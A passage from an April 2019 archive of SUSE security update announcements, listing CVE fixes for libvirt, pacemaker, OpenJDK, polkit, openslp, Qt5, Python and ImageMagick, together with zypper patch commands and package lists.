p11-kit-tools-0.23.2-4.2.1 p11-kit-tools-debuginfo-0.23.2-4.2.1 python-ldb-1.2.4-3.12.1 python-ldb-debuginfo-1.2.4-3.12.1 python-ldb-devel-1.2.4-3.12.1 python-talloc-2.1.11-3.5.3 python-talloc-debuginfo-2.1.11-3.5.3 python-talloc-devel-2.1.11-3.5.3 python3-ldb-1.2.4-3.12.1 python3-ldb-debuginfo-1.2.4-3.12.1 python3-ldb-devel-1.2.4-3.12.1 python3-talloc-2.1.11-3.5.3 python3-talloc-debuginfo-2.1.11-3.5.3 python3-talloc-devel-2.1.11-3.5.3 samba-4.7.11+git.153.b36ceaf2235-4.27.1 samba-client-4.7.11+git.153.b36ceaf2235-4.27.1 samba-client-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-core-devel-4.7.11+git.153.b36ceaf2235-4.27.1 samba-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-debugsource-4.7.11+git.153.b36ceaf2235-4.27.1 samba-libs-4.7.11+git.153.b36ceaf2235-4.27.1 samba-libs-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-winbind-4.7.11+git.153.b36ceaf2235-4.27.1 samba-winbind-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 talloc-debugsource-2.1.11-3.5.3 talloc-man-2.1.11-3.5.3 tdb-debugsource-1.3.15-3.6.3 tdb-tools-1.3.15-3.6.3 tdb-tools-debuginfo-1.3.15-3.6.3 tevent-debugsource-0.9.36-4.10.3 tevent-man-0.9.36-4.10.3 typelib-1_0-Avahi-0_6-0.6.32-5.5.8 - SUSE Linux Enterprise Module for Basesystem 15 (x86_64): libavahi-client3-32bit-0.6.32-5.5.3 libavahi-client3-32bit-debuginfo-0.6.32-5.5.3 libavahi-common3-32bit-0.6.32-5.5.3 libavahi-common3-32bit-debuginfo-0.6.32-5.5.3 libcups2-32bit-2.2.7-3.11.7 libcups2-32bit-debuginfo-2.2.7-3.11.7 libdcerpc-binding0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libdcerpc-binding0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libdcerpc0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libdcerpc0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libfam0-gamin-32bit-0.1.10-3.2.3 libfam0-gamin-32bit-debuginfo-0.1.10-3.2.3 libgnutls30-32bit-3.6.2-6.5.4 libgnutls30-32bit-debuginfo-3.6.2-6.5.4 libhogweed4-32bit-3.4.1-4.9.1 libhogweed4-32bit-debuginfo-3.4.1-4.9.1 libldb1-32bit-1.2.4-3.12.1 libldb1-32bit-debuginfo-1.2.4-3.12.1 libndr-krb5pac0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-krb5pac0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-nbt0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-nbt0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-standard0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-standard0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libndr0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libndr0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libnetapi0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libnetapi0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libnettle6-32bit-3.4.1-4.9.1 libnettle6-32bit-debuginfo-3.4.1-4.9.1 libp11-kit0-32bit-0.23.2-4.2.1 libp11-kit0-32bit-debuginfo-0.23.2-4.2.1 libsamba-credentials0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-credentials0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-errors0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-errors0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-hostconfig0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-hostconfig0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-passdb0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-passdb0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-util0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-util0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsamdb0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libsamdb0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbclient0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbclient0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbconf0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbconf0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbldap2-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbldap2-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libtalloc2-32bit-2.1.11-3.5.3 libtalloc2-32bit-debuginfo-2.1.11-3.5.3 libtasn1-6-32bit-4.13-4.2.1 libtasn1-6-32bit-debuginfo-4.13-4.2.1 libtdb1-32bit-1.3.15-3.6.3 libtdb1-32bit-debuginfo-1.3.15-3.6.3 libtevent-util0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libtevent-util0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libtevent0-32bit-0.9.36-4.10.3 libtevent0-32bit-debuginfo-0.9.36-4.10.3 libwbclient0-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 libwbclient0-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-client-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 samba-client-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-libs-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 samba-libs-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-winbind-32bit-4.7.11+git.153.b36ceaf2235-4.27.1 samba-winbind-32bit-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 - SUSE Linux Enterprise Module for Basesystem 15 (noarch): avahi-lang-0.6.32-5.5.3 - SUSE Linux Enterprise High Availability 15 (aarch64 ppc64le s390x x86_64): ctdb-4.7.11+git.153.b36ceaf2235-4.27.1 ctdb-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-debugsource-4.7.11+git.153.b36ceaf2235-4.27.1 References: https://www.suse.com/security/cve/CVE-2019-3880.html https://bugzilla.suse.com/1114407 https://bugzilla.suse.com/1124223 https://bugzilla.suse.com/1125410 https://bugzilla.suse.com/1126377 https://bugzilla.suse.com/1131060 https://bugzilla.suse.com/1131686 From sle-security-updates at lists.suse.com Fri Apr 26 04:11:06 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 26 Apr 2019 12:11:06 +0200 (CEST) Subject: SUSE-SU-2019:1042-1: moderate: Security update for libvirt Message-ID: <20190426101106.10AC7F3DB@maintenance.suse.de> SUSE Security Update: Security update for libvirt ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1042-1 Rating: moderate References: #1120813 #1126325 #1127458 #1131595 #1131955 Cross-References: CVE-2019-3840 CVE-2019-3886 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Desktop 12-SP3 ______________________________________________________________________________ An update that solves two vulnerabilities and has three fixes is now available. Description: This update for libvirt fixes the following issues: Security issues fixed: - CVE-2019-3840: Fixed a null pointer dereference vulnerability in virJSONValueObjectHasKey function which could have resulted in a remote denial of service via the guest agent (bsc#1127458). - CVE-2019-3886: Fixed an information leak which allowed to retrieve the guest hostname under readonly mode (bsc#1131595). Other issue addressed: - cpu: add Skylake-Server and Skylake-Server-IBRS CPU models (FATE#327261, bsc#1131955) - libxl: save current memory value after successful balloon (bsc#1120813). - libxl: support Xen's max_grant_frames setting with maxGrantFrames attribute on the xenbus controller (bsc#1126325). - conf: add new 'xenbus' controller type Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1042=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1042=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1042=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): libvirt-debugsource-3.3.0-5.30.1 libvirt-devel-3.3.0-5.30.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): libvirt-3.3.0-5.30.1 libvirt-admin-3.3.0-5.30.1 libvirt-admin-debuginfo-3.3.0-5.30.1 libvirt-client-3.3.0-5.30.1 libvirt-client-debuginfo-3.3.0-5.30.1 libvirt-daemon-3.3.0-5.30.1 libvirt-daemon-config-network-3.3.0-5.30.1 libvirt-daemon-config-nwfilter-3.3.0-5.30.1 libvirt-daemon-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-interface-3.3.0-5.30.1 libvirt-daemon-driver-interface-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-lxc-3.3.0-5.30.1 libvirt-daemon-driver-lxc-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-network-3.3.0-5.30.1 libvirt-daemon-driver-network-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-nodedev-3.3.0-5.30.1 libvirt-daemon-driver-nodedev-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-nwfilter-3.3.0-5.30.1 libvirt-daemon-driver-nwfilter-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-qemu-3.3.0-5.30.1 libvirt-daemon-driver-qemu-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-secret-3.3.0-5.30.1 libvirt-daemon-driver-secret-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-3.3.0-5.30.1 libvirt-daemon-driver-storage-core-3.3.0-5.30.1 libvirt-daemon-driver-storage-core-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-disk-3.3.0-5.30.1 libvirt-daemon-driver-storage-disk-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-iscsi-3.3.0-5.30.1 libvirt-daemon-driver-storage-iscsi-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-logical-3.3.0-5.30.1 libvirt-daemon-driver-storage-logical-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-mpath-3.3.0-5.30.1 libvirt-daemon-driver-storage-mpath-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-scsi-3.3.0-5.30.1 libvirt-daemon-driver-storage-scsi-debuginfo-3.3.0-5.30.1 libvirt-daemon-hooks-3.3.0-5.30.1 libvirt-daemon-lxc-3.3.0-5.30.1 libvirt-daemon-qemu-3.3.0-5.30.1 libvirt-debugsource-3.3.0-5.30.1 libvirt-doc-3.3.0-5.30.1 libvirt-libs-3.3.0-5.30.1 libvirt-libs-debuginfo-3.3.0-5.30.1 libvirt-lock-sanlock-3.3.0-5.30.1 libvirt-lock-sanlock-debuginfo-3.3.0-5.30.1 libvirt-nss-3.3.0-5.30.1 libvirt-nss-debuginfo-3.3.0-5.30.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 x86_64): libvirt-daemon-driver-storage-rbd-3.3.0-5.30.1 libvirt-daemon-driver-storage-rbd-debuginfo-3.3.0-5.30.1 - SUSE Linux Enterprise Server 12-SP3 (x86_64): libvirt-daemon-driver-libxl-3.3.0-5.30.1 libvirt-daemon-driver-libxl-debuginfo-3.3.0-5.30.1 libvirt-daemon-xen-3.3.0-5.30.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): libvirt-3.3.0-5.30.1 libvirt-admin-3.3.0-5.30.1 libvirt-admin-debuginfo-3.3.0-5.30.1 libvirt-client-3.3.0-5.30.1 libvirt-client-debuginfo-3.3.0-5.30.1 libvirt-daemon-3.3.0-5.30.1 libvirt-daemon-config-network-3.3.0-5.30.1 libvirt-daemon-config-nwfilter-3.3.0-5.30.1 libvirt-daemon-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-interface-3.3.0-5.30.1 libvirt-daemon-driver-interface-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-libxl-3.3.0-5.30.1 libvirt-daemon-driver-libxl-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-lxc-3.3.0-5.30.1 libvirt-daemon-driver-lxc-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-network-3.3.0-5.30.1 libvirt-daemon-driver-network-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-nodedev-3.3.0-5.30.1 libvirt-daemon-driver-nodedev-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-nwfilter-3.3.0-5.30.1 libvirt-daemon-driver-nwfilter-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-qemu-3.3.0-5.30.1 libvirt-daemon-driver-qemu-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-secret-3.3.0-5.30.1 libvirt-daemon-driver-secret-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-3.3.0-5.30.1 libvirt-daemon-driver-storage-core-3.3.0-5.30.1 libvirt-daemon-driver-storage-core-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-disk-3.3.0-5.30.1 libvirt-daemon-driver-storage-disk-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-iscsi-3.3.0-5.30.1 libvirt-daemon-driver-storage-iscsi-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-logical-3.3.0-5.30.1 libvirt-daemon-driver-storage-logical-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-mpath-3.3.0-5.30.1 libvirt-daemon-driver-storage-mpath-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-rbd-3.3.0-5.30.1 libvirt-daemon-driver-storage-rbd-debuginfo-3.3.0-5.30.1 libvirt-daemon-driver-storage-scsi-3.3.0-5.30.1 libvirt-daemon-driver-storage-scsi-debuginfo-3.3.0-5.30.1 libvirt-daemon-lxc-3.3.0-5.30.1 libvirt-daemon-qemu-3.3.0-5.30.1 libvirt-daemon-xen-3.3.0-5.30.1 libvirt-debugsource-3.3.0-5.30.1 libvirt-doc-3.3.0-5.30.1 libvirt-libs-3.3.0-5.30.1 libvirt-libs-debuginfo-3.3.0-5.30.1 References: https://www.suse.com/security/cve/CVE-2019-3840.html https://www.suse.com/security/cve/CVE-2019-3886.html https://bugzilla.suse.com/1120813 https://bugzilla.suse.com/1126325 https://bugzilla.suse.com/1127458 https://bugzilla.suse.com/1131595 https://bugzilla.suse.com/1131955 From sle-security-updates at lists.suse.com Fri Apr 26 07:16:07 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 26 Apr 2019 15:16:07 +0200 (CEST) Subject: SUSE-SU-2019:1047-1: important: Security update for pacemaker Message-ID: <20190426131607.1A70FF3DB@maintenance.suse.de> SUSE Security Update: Security update for pacemaker ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1047-1 Rating: important References: #1117381 #1117934 #1128374 #1128772 #1131353 #1131356 #1131357 Cross-References: CVE-2018-16877 CVE-2018-16878 CVE-2019-3885 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise High Availability 12-SP4 ______________________________________________________________________________ An update that solves three vulnerabilities and has four fixes is now available. Description: This update for pacemaker fixes the following issues: Security issues fixed: - CVE-2019-3885: Fixed an information disclosure in log output. (bsc#1131357) - CVE-2018-16877: Fixed a local privilege escalation through insufficient IPC client-server authentication. (bsc#1131356) - CVE-2018-16878: Fixed a denial of service through insufficient verification inflicted preference of uncontrolled processes. (bsc#1131353) Non-security issue fixed: - scheduler: Respect the order of constraints when relevant resources are being probed. (bsc#1117934, bsc#1128374) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1047=1 - SUSE Linux Enterprise High Availability 12-SP4: zypper in -t patch SUSE-SLE-HA-12-SP4-2019-1047=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): libpacemaker-devel-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-cts-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-cts-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-debugsource-1.1.19+20181105.ccd6b5b10-3.10.1 - SUSE Linux Enterprise High Availability 12-SP4 (ppc64le s390x x86_64): libpacemaker3-1.1.19+20181105.ccd6b5b10-3.10.1 libpacemaker3-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-cli-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-cli-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-cts-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-cts-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-debugsource-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-remote-1.1.19+20181105.ccd6b5b10-3.10.1 pacemaker-remote-debuginfo-1.1.19+20181105.ccd6b5b10-3.10.1 References: https://www.suse.com/security/cve/CVE-2018-16877.html https://www.suse.com/security/cve/CVE-2018-16878.html https://www.suse.com/security/cve/CVE-2019-3885.html https://bugzilla.suse.com/1117381 https://bugzilla.suse.com/1117934 https://bugzilla.suse.com/1128374 https://bugzilla.suse.com/1128772 https://bugzilla.suse.com/1131353 https://bugzilla.suse.com/1131356 https://bugzilla.suse.com/1131357 From sle-security-updates at lists.suse.com Fri Apr 26 10:12:12 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 26 Apr 2019 18:12:12 +0200 (CEST) Subject: SUSE-SU-2019:1052-1: moderate: Security update for java-11-openjdk Message-ID: <20190426161212.7FB46F3DB@maintenance.suse.de> SUSE Security Update: Security update for java-11-openjdk ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1052-1 Rating: moderate References: #1132728 #1132732 Cross-References: CVE-2019-2602 CVE-2019-2684 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for java-11-openjdk to version 11.0.3+7 fixes the following issues: Security issues fixed: - CVE-2019-2602: Fixed excessive use of CPU time in the BigDecimal implementation (bsc#1132728). - CVE-2019-2684: Fixed a flaw in the RMI registry implementation which could lead to selection of an incorrect skeleton class (bsc#1132732). Non-security issues fixed: - Multiple bug fixes and improvements. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1052=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): java-11-openjdk-11.0.3.0-3.21.2 java-11-openjdk-accessibility-11.0.3.0-3.21.2 java-11-openjdk-accessibility-debuginfo-11.0.3.0-3.21.2 java-11-openjdk-debuginfo-11.0.3.0-3.21.2 java-11-openjdk-debugsource-11.0.3.0-3.21.2 java-11-openjdk-demo-11.0.3.0-3.21.2 java-11-openjdk-devel-11.0.3.0-3.21.2 java-11-openjdk-headless-11.0.3.0-3.21.2 java-11-openjdk-jmods-11.0.3.0-3.21.2 java-11-openjdk-src-11.0.3.0-3.21.2 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch): java-11-openjdk-javadoc-11.0.3.0-3.21.2 References: https://www.suse.com/security/cve/CVE-2019-2602.html https://www.suse.com/security/cve/CVE-2019-2684.html https://bugzilla.suse.com/1132728 https://bugzilla.suse.com/1132732 From sle-security-updates at lists.suse.com Fri Apr 26 19:08:58 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sat, 27 Apr 2019 03:08:58 +0200 (CEST) Subject: SUSE-SU-2019:0019-2: moderate: Security update for polkit Message-ID: <20190427010858.C5BA2F3D3@maintenance.suse.de> SUSE Security Update: Security update for polkit ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0019-2 Rating: moderate References: #1118277 Cross-References: CVE-2018-19788 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for polkit fixes the following issues: Security issue fixed: - CVE-2018-19788: Fixed handling of UIDs over MAX_UINT (bsc#1118277) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-19=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libpolkit0-0.113-5.15.1 libpolkit0-debuginfo-0.113-5.15.1 polkit-0.113-5.15.1 polkit-debuginfo-0.113-5.15.1 polkit-debugsource-0.113-5.15.1 typelib-1_0-Polkit-1_0-0.113-5.15.1 References: https://www.suse.com/security/cve/CVE-2018-19788.html https://bugzilla.suse.com/1118277 From sle-security-updates at lists.suse.com Fri Apr 26 19:09:35 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sat, 27 Apr 2019 03:09:35 +0200 (CEST) Subject: SUSE-SU-2018:2991-3: important: Security update for openslp Message-ID: <20190427010935.1DAD6F3D3@maintenance.suse.de> SUSE Security Update: Security update for openslp ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:2991-3 Rating: important References: #1090638 Cross-References: CVE-2017-17833 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for openslp fixes the following issues: - CVE-2017-17833: Prevent heap-related memory corruption issue which may have manifested itself as a denial-of-service or a remote code-execution vulnerability (bsc#1090638) - Prevent out of bounds reads in message parsing Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1057=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): openslp-2.0.0-18.17.1 openslp-32bit-2.0.0-18.17.1 openslp-debuginfo-2.0.0-18.17.1 openslp-debuginfo-32bit-2.0.0-18.17.1 openslp-debugsource-2.0.0-18.17.1 openslp-server-2.0.0-18.17.1 openslp-server-debuginfo-2.0.0-18.17.1 References: https://www.suse.com/security/cve/CVE-2017-17833.html https://bugzilla.suse.com/1090638 From sle-security-updates at lists.suse.com Fri Apr 26 19:10:08 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sat, 27 Apr 2019 03:10:08 +0200 (CEST) Subject: SUSE-SU-2018:4210-2: moderate: Security update for libqt5-qtbase Message-ID: <20190427011008.A453AF3D3@maintenance.suse.de> SUSE Security Update: Security update for libqt5-qtbase ______________________________________________________________________________ Announcement ID: SUSE-SU-2018:4210-2 Rating: moderate References: #1118595 #1118596 Cross-References: CVE-2018-15518 CVE-2018-19873 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for libqt5-qtbase fixes the following issues: Security issues fixed: - CVE-2018-15518: Fixed double free in QXmlStreamReader (bsc#1118595) - CVE-2018-19873: Fixed Denial of Service on malformed BMP file in QBmpHandler (bsc#1118596) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1056=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libQt5Core5-5.5.1-8.3.1 libQt5Core5-debuginfo-5.5.1-8.3.1 libQt5DBus5-5.5.1-8.3.1 libQt5DBus5-debuginfo-5.5.1-8.3.1 libQt5Gui5-5.5.1-8.3.1 libQt5Gui5-debuginfo-5.5.1-8.3.1 libQt5Network5-5.5.1-8.3.1 libQt5Network5-debuginfo-5.5.1-8.3.1 libQt5Widgets5-5.5.1-8.3.1 libQt5Widgets5-debuginfo-5.5.1-8.3.1 libqt5-qtbase-debugsource-5.5.1-8.3.1 References: https://www.suse.com/security/cve/CVE-2018-15518.html https://www.suse.com/security/cve/CVE-2018-19873.html https://bugzilla.suse.com/1118595 https://bugzilla.suse.com/1118596 From sle-security-updates at lists.suse.com Fri Apr 26 19:10:49 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sat, 27 Apr 2019 03:10:49 +0200 (CEST) Subject: SUSE-SU-2019:0482-2: important: Security update for python Message-ID: <20190427011049.27F79F3D3@maintenance.suse.de> SUSE Security Update: Security update for python ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0482-2 Rating: important References: #1073748 #1109847 #1122191 Cross-References: CVE-2018-14647 CVE-2019-5010 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that solves two vulnerabilities and has one errata is now available. Description: This update for python fixes the following issues: Security issues fixed: - CVE-2019-5010: Fixed a denial-of-service vulnerability in the X509 certificate parser (bsc#1122191). - CVE-2018-14647: Fixed a denial-of-service vulnerability in Expat (bsc#1109847). Non-security issue fixed: - Fixed a bug where PyWeakReference struct was not initialized correctly leading to a crash (bsc#1073748). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-482=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libpython2_7-1_0-2.7.13-28.21.1 libpython2_7-1_0-32bit-2.7.13-28.21.1 libpython2_7-1_0-debuginfo-2.7.13-28.21.1 libpython2_7-1_0-debuginfo-32bit-2.7.13-28.21.1 python-2.7.13-28.21.1 python-32bit-2.7.13-28.21.1 python-base-2.7.13-28.21.1 python-base-32bit-2.7.13-28.21.1 python-base-debuginfo-2.7.13-28.21.1 python-base-debuginfo-32bit-2.7.13-28.21.1 python-base-debugsource-2.7.13-28.21.1 python-curses-2.7.13-28.21.1 python-curses-debuginfo-2.7.13-28.21.1 python-debuginfo-2.7.13-28.21.1 python-debuginfo-32bit-2.7.13-28.21.1 python-debugsource-2.7.13-28.21.1 python-demo-2.7.13-28.21.1 python-devel-2.7.13-28.21.1 python-gdbm-2.7.13-28.21.1 python-gdbm-debuginfo-2.7.13-28.21.1 python-idle-2.7.13-28.21.1 python-tk-2.7.13-28.21.1 python-tk-debuginfo-2.7.13-28.21.1 python-xml-2.7.13-28.21.1 python-xml-debuginfo-2.7.13-28.21.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (noarch): python-doc-2.7.13-28.21.1 python-doc-pdf-2.7.13-28.21.1 References: https://www.suse.com/security/cve/CVE-2018-14647.html https://www.suse.com/security/cve/CVE-2019-5010.html https://bugzilla.suse.com/1073748 https://bugzilla.suse.com/1109847 https://bugzilla.suse.com/1122191 From sle-security-updates at lists.suse.com Fri Apr 26 19:11:44 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Sat, 27 Apr 2019 03:11:44 +0200 (CEST) Subject: SUSE-SU-2019:1033-2: moderate: Security update for ImageMagick Message-ID: <20190427011144.EFA04F3D3@maintenance.suse.de> SUSE Security Update: Security update for ImageMagick ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1033-2 Rating: moderate References: #1106989 #1106996 #1107609 #1120381 #1122033 #1124365 #1124366 #1124368 #1128649 #1130330 #1131317 #1132053 #1132054 #1132060 Cross-References: CVE-2018-16412 CVE-2018-16413 CVE-2018-16644 CVE-2018-20467 CVE-2019-10650 CVE-2019-11007 CVE-2019-11008 CVE-2019-11009 CVE-2019-7175 CVE-2019-7395 CVE-2019-7397 CVE-2019-7398 CVE-2019-9956 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that solves 13 vulnerabilities and has one errata is now available. Description: This update for ImageMagick fixes the following issues: Security issues fixed: - CVE-2019-9956: Fixed a stack-based buffer overflow in PopHexPixel() (bsc#1130330). - CVE-2019-10650: Fixed a heap-based buffer over-read in WriteTIFFImage() (bsc#1131317). - CVE-2019-7175: Fixed multiple memory leaks in DecodeImage function (bsc#1128649). - CVE-2018-20467: Fixed infinite loop in coders/bmp.c (bsc#1120381). - CVE-2019-7398: Fixed a memory leak in the function WriteDIBImage (bsc#1124365). - CVE-2019-7397: Fixed a memory leak in the function WritePDFImage (bsc#1124366). - CVE-2019-7395: Fixed a memory leak in the function WritePSDChannel (bsc#1124368). - CVE-2018-16413: 